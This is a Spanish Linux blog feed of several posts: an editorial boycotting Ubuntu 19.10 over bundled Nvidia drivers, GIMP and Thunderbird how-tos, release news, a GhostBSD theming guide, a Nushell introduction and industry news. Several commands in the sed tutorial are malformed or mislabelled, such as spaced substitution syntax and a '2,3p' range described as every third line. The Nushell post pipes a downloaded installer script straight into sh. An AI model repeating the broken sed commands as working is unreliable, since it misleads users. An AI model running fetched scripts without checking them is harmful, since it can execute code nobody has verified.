Skip to main content

 

A partir de Ubuntu 19.10 pasará a ser formalmente una distro desconfiable (Mini editorial dominguero)


Seré muy breve. El plan es que Ubuntu 19.10 venga con los controladores privativos de Nvidia incluídos en la imagen ISO. ¿Por qué Ubuntu incluye controladores de código cerrado en su medio de instalación? Dice que es para mejorar la experiencia general de instalación de Ubuntu.

Pues sí, Ubuntu 19.10 también continuará la marcha constante también por parte de Canonical hacia destruir el software libre, colocando el controlador propietario directamente en la ISO. Esto sigue a la decisión de la compañía de incluir las actualizaciones actuales de los controladores de Nvidia como parte de las actualizaciones regulares del sistema en las ediciones LTS (Long-Term Support).

Dicen que por defecto vendrá el driver Noveau pero también disponible el privativo. A partir de ya, Ubuntu pasa en este blog a estar entre las blacklisted y no se informará nada acerca de esa distro privativa de Canonical. De igual modo se hará boicot a las que se basan en Ubuntu e incluyen los drivers privativos de Nvidia por defecto en la imagen ISO.

Esto va de pena. Menos mal que todavía nos quedan algunas distros que no son sucias. Pero ¿por cuanto tiempo?

No, si al final tendremos que pasarnos a FreeBSD porque GNU/Linux va encaminado a ser un sistema operativo basura, como Windows. Y Ubuntu ya está contaminado. Adiós, Canonical.

Y ahora que en los blogs de Ubuntu que hablen del software libre. Cinismo en estado puro.

ronaldbueno reshared this.


 

Prepara tu super GIMP


No puedo decir que GIMP sea igual cualitativamente que Photoshop, porque el segundo es privativo y jamás lo he usado pero sí estoy seguro que es la mejor alternativa libre que existe. Pero para que sea una gran opción necesita de extensiones.

Los plugins ayudan a convertir GIMP de un buen programa en uno excelente. Añaden nuevas funciones, mejoran el flujo de trabajo y ayudan a hacer de GIMP una de las mejores alternativas a Photoshop.

Pero los plugins y la adición en GIMP no suele ser una labor fácil, es más, puede ser un dolor de cabeza debido a la incompatibilidad entre versiones o la disgregación de las fuentes en internet. Pero en el caso de brochas, pinceles, degradados, patrones, todo es compatible entre las distintas versiones.

Pero ahí es donde entra este artículo. En esta guía te indicaremos dónde obtener los mejores plugins de GIMP y cómo instalarlos. Así que vamos a empezar…

La escena de los plugin de GIMP es un poco desordenada. Los plugins solían ser recopilados en el registro de GIMP, pero eso ya no existe. Lo que significa que ahora están dispersos por Internet.

Algunos también son muy viejos. En muchos casos no se han actualizado en una década o más. No hay garantía de que los plugins funcionen bien con las versiones más recientes de GIMP. De hecho, los más populares como el plugin DDS de GIMP o BIMP están ahora abandonados y ya no funcionan. Sin embargo, chequea en los repositorios de tu distribución porque es posible que vengan muchos plugins. En AUR, en Arch, hay decenas.

Pero la opción manual tampoco es demasiado difícil. La carpeta de GIMP en el directorio de inicio está siempre oculta. Hasta la versión 2.8 estaba en el home/usuario/.gimp-2.8 pero a partir de GIMP 2.10 está dentro de la carpeta oculta .config. Dentro de la carpeta, está la versión de GIMP y si la abres, verás esto:



Así que recuerda. Los plugins la mejor vía es instalarlos mediante tu gestor de paquetes, porque los archivos .py son escasos y a veces dar error. Busca por ejemplo los plugins GMIC, Resynthesizer, Lqr, Hugin, Wavelet Decompose, Gimp-nufraw, Fblur, Refocus e instálalos.

Por último descarga este paquete comprimido que he preparado para supervitaminar tu GIMP. Simplemente lo descomprimes y aparecerá la carpeta gimp. Ábrela, selecciona todos los archivos y en la carpeta de la imagen de arriba, arrastra todo y sobreescribe todo si te pregunta (no se borrará nada de lo que tengas previamente). Debes realizar la operación con el programa cerrado.

Una vez que hayas pasado todo, puedes ejecutar GIMP y verás que ahora tiene un montón de pinceles, brochas, patrones, scripts, algunos plugins y muchos degradados.

Así podrás disfrutar de un genial editor/creador de imágenes.




 

Cómo instalar Thunderbird 68.0 sin tener que esperar a los repositorios


Si sois tan impacientes como yo, que deseo adquirir las últimas implementaciones y mejoras de los programas que uso habitualmente, muchas veces no tienes por qué esperar a que los desarrolladores empaqueten y suban esas aplicaciones a los repositorios. Tienes algunas opciones: O compilas el programa desde las fuentes o te descargas el paquete precompilado y lo instalas a mano.

La primera opción es más complicada porque los paquetes fuente suelen necesitar muchas dependencias que solucionar manualmente. Pero los precompilados es coser y cantar.

Por fin Thunderbird obtiene una actualización después de bastante tiempo. Un tiempo en el que incluso se habló de que no tendría más desarrollo por parte de la Fundación Mozilla. Pero por fortuna, la mejor suite de correos electrónicos de software libre, al menos nos da una tregua y esperanza.

Vamos a realizar una serie de pasos, pocos y sencillos para disfrutar de esta versión fresca de Thunderbird. A día de hoy no había aún llegado a los repos de Arch, así que ignoro si lo ha hecho en la familia Ubuntu.

NOTA: Este método sirve para cualquier paquete precompilado, como Firefox también.

Descarguemos primero el paquete Thunderbird 68.0 en este enlace.



A continuación lo descomprimimos y automáticamente se nos crea una carpeta, thunderbird.

Ahora abrimos una terminal, nos colocamos en Descargas/ o donde quiera que descomprimiste el paquete y movemos la carpeta thunderbird al directorio /opt.
sudo mv thunderbird /opt
Bien, ya tenemos la carpeta que nos interesa en su sitio. La idea de moverla ahí es porque en tu /home corres el riesgo de eliminarla con un despiste. Para explicar algo, si entramos en la carpeta thunderbird veremos un archivo que se llama simplemente thunderbird. Ese es el ejecutable y el que nos interesará en unos momentos.

Tenemos que ir al menú ahora. En mi caso, que uso KDE Plasma, hago clic con el botón derecho sobre ese menú y selecciono Editar Aplicaciones. Nos dirigimos a la pestaña Internet y creamos un nuevo elemento que llamaremos Thunderbird o Emails, Correos, lo que desees.

Ahora fíjate que donde pone Orden debes de meter la ruta del ejecutable donde guardamos Thundebird en opt/:

Donde pone Descripción y Comentario es completamente opcional, no es necesario rellenar.

Ya sólo queda buscarle el icono a nuestra aplicación recién creada. Verás que en la ventana de arriba al lado de Thunderbird hay un cuadrado vacío. Clica en él y se abrirá un dialógo de búsqueda del icono. Localiza el de thunderbird, que probablemente venga o cualquiera que te guste. En mi caso, en el tema de iconos que uso no venía Thunderbird y lo creé yo con Inkscape.



Finalmente, arriba, a la izquierda, clic en Guardar. Accede al menú y verás el icono. Ya puedes ejecutarlo y se iniciará el flamante Thunderbird.




 

Linux Lite 4.6 llega con nuevo selector de temas y muchas mejoras




Hace unos instantes, Jerry Bezencon, de Linux Lite, ha tenido el placer de anunciar el lanzamiento y disponibilidad de Linux Lite 4.6. La nueva versión incluye muchas novedades interesantes, incluyendo que pasa a basarse en Ubuntu 18.04.3. Recordamos que la versión anterior, la v4.4 del sistema operativo lanzada en abril, estaba basada en Ubuntu 18.04.2. También han aprovechado el lanzamiento para actualizar el kernel, que ahora pasa a ser Linux 4.15.0-58.

Tal y como detallaremos a continuación en la lista de novedades, Linux Lite 4.6 también ha incluido paquetes actualizados de muchas de sus aplicaciones, entre las que están Firefox, Thunderbird, LibreOffice, VLC y GIMP. Por otra parte, se ha incluido un selector de temas en Lite Welcome que nos permitirá elegir con facilidad un tema oscuro o uno claro al iniciar el sistema operativo. A continuación tenéis la lista de novedades que nos ha proporcionado Bezencon.

(adsbygoogle = window.adsbygoogle || []).push({});

Novedades incluidas en Linux Lite 4.6

  • Lite Welcome, la pantalla de bienvenida de Linux Lite, incluye un nuevo selector de temas desde el que podremos elegir un tema claro o uno oscuro nada más iniciar el sistema operativo por primera vez.
  • Nueva guía de información sobre los bloqueos de teclado o numeración en Lite Welcome.
  • El manual de ayuda incluye un tutorial de alternar el volumen.
  • Han creado un tutorial para crear USBs con almacenamiento persistente.
  • Se han actualizado las fuentes de Lite con comentarios sobre sus repositorios.
  • El complemento de modo de rendimiento de CPU xfce4-cpufreq-plugin se ha agregado como una opción a la bandeja. Podemos seleccionarlo haciendo clic derecho en la Barra de tareas/Panel/Agregar nuevos elementos/Monitor de frecuencia de CPU. Haciendo clic derecho sobre él podemos moverlo a donde queramos.
  • Nuevos temas.
  • Actualizado el tema de iconos Papirus a su última versión.
  • Otros detalles:
    • Linux 4.15.0-58, pero se pueden instalar otras versiones de la v3.13 a la v5.2.
    • Firefox 68.0.2.
    • Thuderbird 60.8.0.
    • LibreOffice 6.0.7.3.
    • VLC 3.0.7.1.
    • GIMP 2.10.12.
    • Timeshift 19.08.1.
    • Basado en Ubuntu 18.04.3.
Linux Lite 4.6 está disponible desde este enlace.
Bild/Foto
Artículo relacionado:
Linux Lite, el primer sistema operativo en poder instalar Linux 5.2. Te explicamos cómo

https://www.linuxadictos.com/linux-lite-4-6-llega-con-nuevo-selector-de-temas-y-muchas-mejoras.html

 

sed: ejemplos del comando mágico para GNU/Linux




En GNU/Linux hay multitud de herramientas que ya vienen preinstaladas con el sistema y que no todos usan. Algunas de ellas son ciertamente desconocidas, en cambio, podrían hacer muchas cosas para facilitar nuestro trabajo diario. Hoy te presento al comando sed, no es una utilidad rara, de hecho es bien conocida. Pero tal vez no conocías todo lo que puede realizar este editor de flujo (de ahí su nombre Stream EDitor). Un potente programa heredado de Unix.

sed puede aceptar como entrada un fichero, lo leerá y modificará línea a línea de acuerdo a la orden dada. El resultado será mostrado por la salida estándar, es decir, por la pantalla en este caso. Así permite manipular flujos de datos para buscar, cortar, insertar o reempleazar líneas de texto haciendo uso de expresiones regulares. Quizás algunas funcionalidades te recuerden a otras herramientas como ed o ex.

(adsbygoogle = window.adsbygoogle || []).push({});

Pero para que lo entiendas mejor, aquí tienes algunos buenos ejemplos prácticos de uso de sed. Los he dejado comentados para que sepas para qué sirve cada uno y agruparlos todos dentro del mismo recuadro:

#Ver las líneas de un fichero de texto de la 15 a la 17
sed -n 15,17p nombre.txt

#Mostrar todo el contenido excepto las líneas 10 a 14
sed 10,14d nombre.txt

#Mostrar cada 3º línea comenzando desde la 2
sed -n '2,3p' nombre.txt

#Eliminar la línea 4
sed 4d nombre.txt

#Eliminar la última línea, sea cual sea
sed $ d nombre.txt

#Eliminar un rango de líneas
sed '20 -34d ' nombre.txt
#Eliminar solo las lineas mencionadas
sed '29 -34! d ' nombre.txt

#Agregar una línea en blanco tras cada línea de texto
sed G nombre.txt

#Localizar "hola" y sustituirlo por "hello"
sed 's / hola / hello /' nombre.txt

#Sustituir palabra de una línea concreta
sed '4 s / peligro / seguridad /' nombre.txt

#Sustituir una línea donde se encuentre la palabra "adios" por otra línea escrita
sed '/ adios / c "Esta será la nueva línea"' nombre.txt

Espero haberte ayudado con este minitutorial de sed...

https://www.linuxadictos.com/sed-ejemplos-del-comando-magico-para-gnu-linux.html

 

Linux Play: Ion Fury, Gibbous – A Cthulhu Adventure, Invisigun Reloaded, We Need To Go Deeper…




Regresa Linux Play, nuestra sección de juegos de estreno para Linux que de un tiempo a esta parte sacamos el último domingo de cada mes. Pero agotando agosto y con el menda de minivacaciones apuramos todo lo posible. Lo que no cambia es la selección de diez títulos más uno, incluyendo el FPS Ion Fury, que llega tras cambiar su nombre en el último momento (Ion Maiden se llamaba) para evitarse rollos legales con los mismísimos Iron Maiden; la aventura gráfica Gibbous – A Cthulhu Adventure, a la que ya encumbran al nivel de clásicos como Monkey Island; o la frenética acción multijugador de Invisigun Reloaded, entre otros tantos en los que encontraréis un poco de todo. El uno, el juego gratuito que cierra la lista siempre: Electronic Super Joy 2 (el tráiler es el del juego original, ha sido imposible encontrar el nuevo). Linux Play!

Ten en cuenta:
  • Estos juegos son novedad en Linux, pero pueden haber salido antes para otras plataformas.
  • Antes de comprar lee las opiniones de los usuarios y de la prensa especializada. Revisa también los requisitos técnicos.
  • Esto solo es una selección con lo mejor, pero hay mucho más.
  • Utilizamos Steam como base de datos, pero hay otras tiendas de juegos para Linux con diferentes condiciones que te puede interesar conocer.
×

Ion Fury




Gibbous – A Cthulhu Adventure




Invisigun Reloaded




We Need To Go Deeper




Anodyne 2: Return to Dust




Smith and Winston




Knights And Bikes




Space Mercs




From Orbit




A Short Hike




* * *



Electronic Super Joy 2



https://www.muylinux.com/2019/08/31/linux-play-97/

 

NVIDIA actualiza su driver para Linux con muchas mejoras y correcciones


Durante las primeras semanas del desarrollo de Linux 5.3, Linus Torvalds y compañía avisaron: han hecho muchos cambios, muchas novedades están por llegar, pero había una novedad que no era una función o algo positivo con el driver NVIDIA en las arquitecturas Power. Era la compañía famosa por sus tarjetas gráficas quien tenía que solventar este problema. No ha habido noticias al respecto desde entonces, hasta hoy, pero no han dejado claro si esta actualización soluciona el problema de compatibilidad con Linux 5.3.

Lo que se lanzó ayer fue NVIDIA 435.21 y ya está disponible para Linux junto a BSD y Solaris. Tal y como leemos en el hilo de su web oficial, se trata de un lanzamiento de “vida corta”, lo que significa que no estará soportado durante mucho tiempo. Entre la lista de novedades, tenemos que se ha corregido un fallo que causaba que X Server se bloqueara al usar HardDPMS con una pantalla de GPU impulsada por NVIDIA.

(adsbygoogle = window.adsbygoogle || []).push({});

Novedades del driver NVIDIA 4.35.21

  • Soporte inicial para la administración de energía de tiempo de ejecución D3 (RTD3) en las GPU de notebooks Turing, junto con toda la implementación necesaria para el script nvidia-bug-report.sh para recopilar información de administración de energía de tiempo de ejecución D3 (RTD3) y tablas ACPI (si la herramienta acpidump está disponible) para depurar.
  • Soporte para cambiar la función Digital Vibrance en la sección de controles de la pantalla en nvidia-settings en hardware Turing.
  • Se ha incluido soporte para las tecnologías gráficas Vulkan y OpenGL/GLX para la función PRIME Render Offload.
  • Se ha actualizado nvidia-installer para que sea compatible con las interfaces del kernel precompiladas.
  • Corregido un fallo que causaba un “kernel panic” al salir de un servidor X individual en una configuración SLI multi-server.
  • Corregido un fallo de segmentación en la librería libnvcuvid.so al usar las APis de Video Codec SDK.
  • El controlador NvEncodeAPI rechaza correctamente la codificación de secuencias con resoluciones más pequeñas que las admitidas por el codificador NVENC.
  • Corrige un error en el componente nvidia-drm que evita que marque correctamente los modos preferidos cuando el usuario desea informar la información de visualización a través de la API DRM-KMS.
  • Mejora la API cuvidParseVideoData en el controlador NVCUVID.
  • Corrige un error que causaba que el controlador NVIDIA X se bloqueara o no funcionara correctamente cuando un cliente consultaba la información de Xinerama en servidores X sin una pantalla NVIDIA X configurada como pantalla 0.
  • Mejora la configuración de NVIDIA en las opciones “Configuración de OpenGL> Configuración de imagen” para GPU Quadro.
  • Mejora el soporte para aplicaciones Vulkan.
  • Corrige el manejo del rango de color de la pantalla en GPU pre-Turing.
NVIDIA 435.21 ya está disponible junto al resto de drivers de la marca desde este enlace.
Bild/Foto
Artículo relacionado:
Nvidia 430.14 Linux Driver ya disponible con buenas noticias para jugones

https://www.linuxadictos.com/nvidia-actualiza-su-driver-para-linux-con-muchas-mejoras-y-correcciones.html

 

Software libre excelente: El caso de GIMP


Hoy, en la serie dedicada a los maravillosos programas con licencia libre le toca el turno a GIMP.

Como todo el mundo sabe, GIMP es una aplicación multiplataforma de edición de imágenes gratuita y de código libre. El programa incluye una serie de funciones de calidad profesional que pueden competir realmente con las capacidades de Adobe Photoshop. Sus notables características de montaje permiten al usuario afinar fácilmente las fotos/imágenes y crear obras de arte desde cero. La selección incluye reducción de ruido, recorte, herramientas de mejora automática de imágenes, herramientas de ajuste de color, degradados, pinceles personalizables y mucho más.

GIMP también proporciona muchas funciones para el usuario avanzado, como filtros, curvas Bezier, máscaras de capa y proporciona también animación. Su soporte para plugins preinstalados o descargables también es recomendable. En general, el software es muy poderoso y a tener en cuenta entre las mejores aplicaciones de edición de imágenes, y el paquete ideal para fotógrafos geek a los que les gusta mantener su espacio de edición bajo control.

GIMP es una solución de edición de imágenes para todos los sistemas operativos que lidera el mercado de programas de código abierto similares. Le da al usuario la libertad de manipular su código fuente y distribuir los cambios. La aplicación es 100% gratuita, pero eso no significa que comprometa sus características. Tiene un gran impacto en términos de características de calidad que lo convierten en la mejor alternativa gratuita a las herramientas populares de calidad comercial como Adobe Photoshop. GIMP proporciona todas las herramientas sofisticadas para el deleite de fotógrafos, diseñadores gráficos e ilustradores que buscan la forma más conveniente de realizar el trabajo.

El programa cuenta con una interfaz estándar que se ajusta a la disposición del programa de gráficos de gama alta. La interfaz está diseñada para ser más limpia y mejorar el rendimiento. Al examinarlo más de cerca, notarás que la interfaz de usuario está dividida en tres partes. Está el área de edición principal, la caja de herramientas y la capa, las rutas, deshacer y los canales. Las pestañas de imagen muestran miniaturas de imágenes vitales, a diferencia de otros programas que sólo muestran el nombre.



Aunque GIMP carece de alguna función de los programas de edición de fotos comerciales, proporciona todas las funciones de edición, comandos y herramientas esenciales. Además, el software va más allá de lo básico para proporcionar algunas herramientas de edición avanzadas como la manipulación de canales. Su función “abrir como capas” es una característica notable que permite a los usuarios mapear una imagen en la capa de otra.

Además de ser un programa de código abierto, GIMP es fácilmente extensible. Permite al usuario mejorar la productividad a través de muchas opciones de personalización y su soporte para plugins de terceros. Su activa comunidad de desarrolladores ha creado una amplia gama de plugins.

GIMP tiene casi todas las herramientas de edición de fotos, funciones y comandos esenciales que la mayoría de los usuarios desean. Estos incluyen filtros de efectos especiales; controles de exposición, como niveles y curvas; y controles de color, como tono/saturación; reemplazar color, relleno de cubo, pincel, borrador, herramientas de selección, etc. Funcionan muy bien y producen una imagen de buena calidad. Además te permite exportar imágenes en una enorme cantidad de formatos, así como poder crear patrones, pinceles, etc.

GIMP es uno de los baluartes más importantes dentro del software libre. Como dato curioso, deberías saber que GNOME salió de las librerías de GIMP.

 

Usar Dolphin como navegador de archivos predeterminado en Ubuntu


Sí, ya se que muchos usuarios de GNOME se echarán las manos a la cabeza, pero son cada vez más quienes piensan que Dolphin es más completo, amigable y flexible que Nautilus. No es lo “natural” y el problema aquí es que necesitas instalar como dependencias muchos paquetes de KDE Plasma para obtener el navegador de archivos predeterminado de KDE. Y es que Dolphin está muy bien desarrollado. No hay más que ver cómo Nautilus, Nemo, Thunar, escalan los iconos y cómo lo hace Dolphin, que lo hace adaptativamente.

Lo que sí garantizo es que vale la pena. Vamos a ello.

Ingresa en la terminal:
sudo apt install dolphin konsole dolphin-plugins


Tardará un poco debido a las dependencias.

Una vez instalado todo, ejecuta Dolphin y si quieres, en el dock, ancla el icono para tenerlo como acceso directo. Si deseas crear un atajo de teclado, ve a Ajustes de sistema > Teclado > Accesos directos.
Selecciona Atajos personalizados.
Haz clic en el botón “más” (“+”) > aparece un cuadro de diálogo.
Inserta el nombre “Dolphin” sin comillas > OK > aparece una nueva entrada con la tecla combo vacía > asociarla con la combinación que prefieras.





Por último, os dejo un breve vídeo con lo que obtendréis con el cambio a Dolphin. En primer lugar aparece Nautilus, y detrás Dolphin.

https://maslinux.es/wp-content/uploads/2019/08/Kaos.webm

 

GhostBSD con aspecto de OSX


En general, creo que GhostBSD es lo más fácil que hay cuando se configura un sistema de escritorio basado en BSD. Su instalador es fácil de usar, el escritorio está preconfigurado, hay una pequeña cantidad de aplicaciones útiles disponibles desde el primer momento. Es una experiencia muy positiva, en mi opinión. Una de las mejores cosas que creo que los usuarios de GNU/Linux pueden encontrar al probar GhostBSD es la falta de ciertas aplicaciones de código cerrado como Steam, Chrome, Vivaldi, Opera, WPS, Skype o FreeOffice. Estos no están disponibles en GhostBSD por lo que si eres fiel y noble al software libre, te encontrarás a gusto. Para las personas que se quedan con aplicaciones de código abierto, GhostBSD probablemente les proporcionará todo lo que necesitan, pero las personas que quieren ver Netflix o jugar a juegos de gran renombre, este sistema puede no ser capaz de ofrecer esas experiencias.

Por estas carencias especialmente, estoy muy contento con GhostBSD y creo que es una forma agradable de disfrutar de la experiencia de FreeBSD con un proceso de configuración rápido y sencillo.

Me da alegría que GhostBSD funcione con mi ordenador de sobremesa, un evento raro para mí cuando usaba FreeBSD o TrueOS. Espero que esto signifique que las futuras versiones de FreeBSD también funcionen con este hardware. El único problema con el que me topé fue que GhostBSD no puede directamente instalar Plasma. O sí, pero me gusta este MATE.

Me gustaron las aplicaciones por defecto con las que GhostBSD viene incluido. El software incluido es en su mayor parte similar al que encontraríamos en una distribución GNU/Linux convencional y la mayoría de las aplicaciones adicionales que quería se podían encontrar a través del gestor de paquetes. Hablando de gestión de paquetes, creo que OctoPkg es capaz, pero no especialmente fácil de usar. Incluso como gestor de paquetes de bajo nivel, es necesario acostumbrarse, en comparación con Muon o Synaptic. OctoPkg funciona, pero espero que las futuras versiones de GhostBSD sean capaces de adoptar un gestor de software más amigable para principiantes.



Bueno, voy a tener GhostBSD un par de días, así que pensé en darle un toque maquero. Al fin y al cabo GhostBSD y OSX son parientes muy cercanos y la idea no es descabellada. Vale, tanto las BSD como GNU/Linux son ( o mejor, deberían de ser software libre) y macOS X no.

Primero descargamos este tema GTK Mojave oscuro y también este pack de iconos OSX Catalina. Descomprimimos las carpetas una vez descomprimidos los paquetes y movemos el tema GTK a .themes y los iconos Catalina a .icons. Si no existen esas carpetas en el directorio de inicio, las creas.





Ahora vamos al panel superior, el inferior si se quiere, se puede eliminar. En él vamos a personalizar el escritorio tal como adjunto en las imágenes.



A continuación ejecutaremos dconf-editor y seleccionamos los botones a la izquierda en las ventanas como en OSX.



Ahora nos descargamos estos temas de Plank (Plank viene instalado por defecto al igual que dconf-editor), los descomprimimos y los movemos a .local/share/plank/themes. Vamos a Plank y hay un truco para entrar en la configuración. Haz clic con el botón derecho del ratón sobre la base del dock a la vez que presionas la tecla Ctrl. Selecciona el tema que más te guste.

Ya sólo falta descargarte un wallpaper guapo como el que acompaña esta captura.


 

Nushell una nueva shell de comandos multiplataforma




Recientemente fue publicada la primera versión del shell de comandos nushell, que combina las capacidades de Power Shell y el shell clásico de Unix.

Nushell utiliza el sistema habitual de canalizaciones para usuarios de Unix en el formato “comando | filtros | controlador de salida”. De forma predeterminada, la salida se formatea con el comando de vista automática, que usa un formato de tabla, pero también es posible usar comandos para mostrar datos e información binarios en una vista de árbol.

(adsbygoogle = window.adsbygoogle || []).push({});

Sobre Nushell


La fortaleza de nushell es la capacidad de manipular datos estructurados, ya que se proporciona un amplio conjunto de instrucciones para filtrar datos estructurados que le permiten filtrar filas, ordenar por columnas, resumir datos, realizar cálculos simples, usar contadores de valores y convertir la salida a formatos CSV, JSON, TOML y YAML.

Para datos no estructurados (texto), se proporcionan instrucciones para dividir en columnas y filas basadas en caracteres delimitadores.u se inspira en proyectos como PowerShell, lenguajes de programación funcionales y herramientas cli modernas.

El shell permite estructurar la salida de varios comandos y el contenido de los archivos y aplicar filtros arbitrarios, que se emiten utilizando una sintaxis unificada que no requiere estudiar las opciones de línea de comandos de cada comando específico.

(adsbygoogle = window.adsbygoogle || []).push({});

Por ejemplo, nushell permite usar construcciones comols | where size> 10kb” y “ps | where cpu> 10“, que solo generará archivos de más de 10Kb y procesos que emplearon más de 10 segundos de recursos de la CPU.

En lugar de utilizar los archivos y servicios como flujos de texto sin procesar, nushell considera cada entrada como algo con estructura. Por ejemplo, cuando enumera el contenido de un directorio, lo que se obtiene es una lista de objetos, donde cada objeto representa un elemento en ese directorio. Estos valores se pueden canalizar a través de una serie de pasos, en una serie de comandos llamados ‘pipeline’.

Nushell utiliza varios complementos para estructurar los datos, que analizan la salida de comandos específicos y tipos de archivos. Se proponen complementos similares para los comandos cd, ls, ps, cp, mkdir, mv, date, rm (el prefijo “^” se puede usar para llamar a comandos nativos, por ejemplo, al llamar “^ ls” se iniciará la utilidad del sistema ls).

También hay comandos especializados, como “open”, para mostrar información sobre el archivo seleccionado en forma de tabla. Para los formatos JSON, TOML y YAML, se admite el análisis automático

El código está escrito en Rust y distribuido bajo la licencia MIT. El proyecto se desarrolló inicialmente como multiplataforma y admite el trabajo en Windows, macOS y Linux. Para expandir la funcionalidad, se pueden usar complementos, cuya interacción se lleva a cabo de acuerdo con el protocolo JSON-RPC.

¿Como instalar nushell en Linux?


Para quienes entes interesados en poder instalar nushell en su distribución de Linux, podrán hacerlo siguiendo las instrucciones que compartimos a continuación.

Para los que son usuarios de Arch Linux, Manjaro, Arco Linux o cualquier otra distribución de basada en Arch Linux pueden realizar la instalacion de nushell desde los repositorios de AUR.

Solamente deben contar con un asistente de AUR instalado y el repositorio habilitado. Si no cuentas con ello puedes visitar el siguiente articulo donde te recomendamos algunos asistentes.

En una terminal solo tienen que teclear el siguiente comando:
yay -S nushell
Ahora para el resto de las distribuciones de Linux tienen que realizar la instalación con ayuda del gestor de paquetes de Rust. Si no cuentas con ello en una terminal debes teclear lo siguiente.
curl https://sh.rustup.rs -sSf | sh
Se nos abrirá una serie de opciones en nuestro terminal y debemos contestar de forma adecuada. Debes pulsar 1 para continuar con la instalación con los valores predeterminados, que es lo aconsejable para la mayoría.

Una vez finalice podremos configurar nuestro shell actual para comenzar a trabajar:
source $HOME/.cargo/env
Para instalar nushell vía cargo, basta con teclear en la terminal el siguiente comando:

Y listo con ello ya podras hacer uso de esta shell en tu sistema.

https://www.linuxadictos.com/nushell-una-nueva-shell-de-comandos-multiplataforma.html

 

Vmware compro dos compañías de seguridad en la nube




VMware anuncio la adquisición del proveedor de plataforma de software Pivotal Software Inc., un proveedor líder de plataforma en la nube. VMware y Pivotal anunciaron que las compañías habían celebrado un acuerdo definitivo en virtud del cual VMware compraría Pivotal a un precio ponderado de $ 11.71 por acción, en total, la consideración de la fusión representa un valor de negocio de $ 2.7 mil millones para Pivotal.

Por otro lado también VMware compro Carbon Black el cual tiene una plataforma de seguridad en la nube que utiliza big data y análisis de comportamiento para protegerse contra los ciberataques. Con ello después del cierre de las transacciones, VMware podrá proporcionar la cartera más completa basada en Kubernetes para empresas para aplicaciones modernas.

(adsbygoogle = window.adsbygoogle || []).push({});
“Kubernetes se está convirtiendo en el estándar de facto para las aplicaciones modernas de múltiples nubes.

Estamos entusiasmados de combinar la plataforma, las herramientas y los servicios de desarrollo de Pivotal con las capacidades de infraestructura de VMware para proporcionar una cartera completa de Kubernetes para crear, ejecutar y administrar aplicaciones modernas

Es importante tener en cuenta que agregar Pivotal a nuestra plataforma acelera nuestra visión más amplia y fortalece nuestra posición de liderazgo en la infraestructura de TI multi-nube actual dijo Pat Gelsinger, CEO de VMware. “

(adsbygoogle = window.adsbygoogle || []).push({});
Con ello VMware pretende ofrecer soluciones a las organizaciones para aprovechar y administrar una infraestructura consistente para soportar aplicaciones críticas.
“Es el momento adecuado para unir fuerzas con VMware, un líder de la industria que comparte nuestro compromiso de hacer contribuciones a la comunidad de código abierto y nuestro objetivo de agregar valor a los desarrolladores más allá de Kubernetes”,

Nuestras dos compañías ya han construido una base sólida sobre el éxito de nuestra colaboración VMware PKS. Esperamos continuar nuestro trabajo con VMware para proporcionar aún más valor a los clientes que crean aplicaciones modernas dijo Rob Mee. , CEO de Pivotal. ”

“La Junta Directiva de VMware está comprometida a crear valor para todos los accionistas”, dijo Karen Dykstra, Presidenta del Comité Especial de la Junta Directiva de VMware.

“Después de una evaluación exhaustiva e independiente de sus asesores y una estrecha colaboración con el equipo de gestión de VMware, el Comité Especial recomendó que la Junta apruebe esta transacción con Pivotal, dado su fuerte valor estratégico a largo plazo para la empresa. empresa y sus clientes “.
En cuanto a la compra de Carbon Black, un líder en protección en la nube, la compañía y VMware anunciaron la firma de un acuerdo definitivo por las dos compañías en virtud del cual VMware adquirirá Carbon Black en una transacción de $ 2.1 mil millones dólares.

Después de completar la transacción, VMware estará en posición de proporcionar seguridad basada en la nube que protegerá mejor las cargas de trabajo y los clientes empresariales a través de big data, análisis de comportamiento e inteligencia artificial.
“La industria de la seguridad está fallando e ineficiente con demasiadas soluciones fragmentadas y sin una arquitectura de plataforma consistente. Al integrar Carbon Black en la familia VMware, ahora estamos dando un gran salto en seguridad y brindando una plataforma corporativa para administrar y proteger las cargas de trabajo, las aplicaciones y las redes dijo Gelsinger. “
Con esta adquisición, VMware también tomará una posición de liderazgo en seguridad para la nueva era de aplicaciones modernas entregadas desde cualquier nube a cualquier dispositivo
“Hoy marca un hito para Carbon Black, VMware y toda la industria de la seguridad cibernética”, dijo Patrick Morley, CEO de Carbon Black.

Ahora tenemos la capacidad de integrar sin problemas la plataforma nativa de protección de endpoints con la nube Carbon Black en todos los puntos de control de VMware. Este tipo de enfoque audaz es exactamente lo que las industrias de la informática y la seguridad han estado buscando durante mucho tiempo.

Esperamos con interés trabajar con el equipo de VMware para continuar brindando una moderna plataforma de seguridad en la nube a clientes de todo el mundo “
La compañía espera que con la compra de estas dos compañías “Carbon Black y Pivotal” aumenten significativamente sus ingresos en durante el primer año después de cerrar los acuerdos de compra que sera hasta Enero del próximo año.

Fuente: https://www.silicon.es/

https://www.linuxadictos.com/vmware-compro-dos-companias-de-seguridad-en-la-nube.html

 

Google cambia la sede de producción de sus productos a la antigua fabrica de Nokia




Durante el lapso de esta semana se dio a conocer la noticia que Google, el gigante estadounidense de Internet, planea trasladar la producción de la mayoría de sus equipos, incluidos los teléfonos Pixel y su altavoz inteligente Google Home, de China hacia la antigua fábrica de Nokia en ubicada en Vietnam.

Con ello Google da a conocer con este movimiento que esta sería una estrategia para establecer una cadena de suministro de bajo costo en el sudeste asiático, especialmente dadas las actuales tensiones comerciales en China, ya que como muchos sabrán en los Estados Unidos, los costos laborales están aumentando en China y los aranceles se están disparando debido a la guerra comercial que tienen actualmente estas dos naciones.

(adsbygoogle = window.adsbygoogle || []).push({});

Según fuentes periodísticas, esta fábrica, a la que se transferirá la producción de teléfonos inteligentes Pixel, se encuentra en la provincia de Bac Ninh, en el norte de Vietnam.

Esta es la misma provincia donde Samsung desarrolló su cadena de suministro de teléfonos inteligentes hace 10 años, lo que significaría que Google tendrá acceso a una fuerza laboral experimentada.

También se informa que la compañía planea exportar entre 8 y 10 millones de teléfonos inteligentes este año, el doble el año pasado, haciendo de Vietnam una parte clave del crecimiento de Google en el mercado de teléfonos inteligentes.

(adsbygoogle = window.adsbygoogle || []).push({});

Este nuevo impulso para desarrollar una base de producción vietnamita por parte de Google refleja las presiones que muchas compañías están sufriendo por los mayores costos laborales chinos y los aranceles en espiral resultantes de la guerra comercial entre Washington y Beijing.

Pues ante esto Google no le queda más opción que buscar alternativas de trasladar la producción de la mayoría de su hardware con destino a Estados Unidos fuera de China, pues un ejemplo que ya vivo fue el del caso Huawei en donde uno de sus mayores clientes esta aun en la cuerda floja de esta guerra comercial.

